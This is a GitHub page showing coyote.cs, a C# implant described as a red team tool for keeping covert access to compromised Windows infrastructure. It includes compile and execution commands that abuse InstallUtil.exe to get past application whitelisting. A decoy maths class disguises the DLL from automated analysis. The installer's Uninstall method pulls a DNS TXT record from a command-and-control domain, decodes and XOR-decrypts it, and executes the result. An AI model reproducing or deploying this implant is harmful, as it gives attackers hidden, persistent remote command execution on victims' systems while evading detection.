-
Notifications
You must be signed in to change notification settings - Fork 1
/
coyote.cs
128 lines (100 loc) · 3.28 KB
/
coyote.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
/*
Implant for maintaining covert access to compromised Windows infrastructure during red team engagements
https://github.com/TartarusLabs/Coyote
To compile it: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:coyote.dll coyote.cs
To execute it: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U coyote.dll
Refer to the README.md for full usage details
*/
using System;
using System.Diagnostics;
using System.IO;
using System.Text;
namespace Coyote
{
// Some decoy functionality to make this look like a legit DLL at least to automated analysis. You can delete the entire CoyoteMaths class and the implant will still work, but a DLL with nothing but an Uninstall method looks suspicious af.
public class CoyoteMaths
{
private bool bInitialised = false;
private bool bUseful = false;
private long x1, x2, x3;
public CoyoteMaths()
{
x1 = 0;
x2 = 2;
x3 = 4;
bInitialised = true;
}
private long AddThem(long a, long b)
{
return a + b;
}
public void CoyoteCompute()
{
if (bInitialised)
{
x1 = x2;
x2 = x3 * 2;
x3 = AddThem(x1,8);
}
}
public bool Useful
{
get
{
return bUseful;
}
set
{
bUseful = value ;
}
}
}
// The important bit
[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
private static string Base64Decode(string base64EncodedData)
{
var base64EncodedBytes = System.Convert.FromBase64String(base64EncodedData);
return System.Text.Encoding.UTF8.GetString(base64EncodedBytes);
}
private string XORDecrypt(string ciphertext, string key)
{
var plaintext = new StringBuilder();
for (int cipherchar = 0; cipherchar < ciphertext.Length; cipherchar++)
{
plaintext.Append((char)((uint)key[cipherchar % key.Length] ^ (uint)ciphertext[cipherchar]));
}
return plaintext.ToString();
}
public override void Uninstall(System.Collections.IDictionary savedState)
{
string c2domain = "updates.tartaruslabs.com"; // Change this to your own FQDN where you will place your DNS TXT record
string XORkey = "pizza"; // Set this to the same XOR key you used in payload-encrypt.ps1
ProcessStartInfo siNslookup = new ProcessStartInfo();
siNslookup.UseShellExecute = false;
siNslookup.RedirectStandardOutput = true;
siNslookup.FileName = @"C:\Windows\System32\nslookup.exe";
siNslookup.Arguments = "-q=txt " + c2domain;
Process pNslookup = Process.Start(siNslookup);
using (StreamReader reader = pNslookup.StandardOutput)
{
string strOutput;
while (!reader.EndOfStream)
{
strOutput = reader.ReadLine();
if (strOutput.Contains("\""))
{
strOutput = strOutput.Trim();
strOutput = strOutput.Trim('"');
ProcessStartInfo siCommand = new ProcessStartInfo(XORDecrypt(Base64Decode(strOutput),XORkey));
siCommand.UseShellExecute = true;
siCommand.RedirectStandardOutput = false;
Process pCommand = Process.Start(siCommand);
}
}
}
}
}
}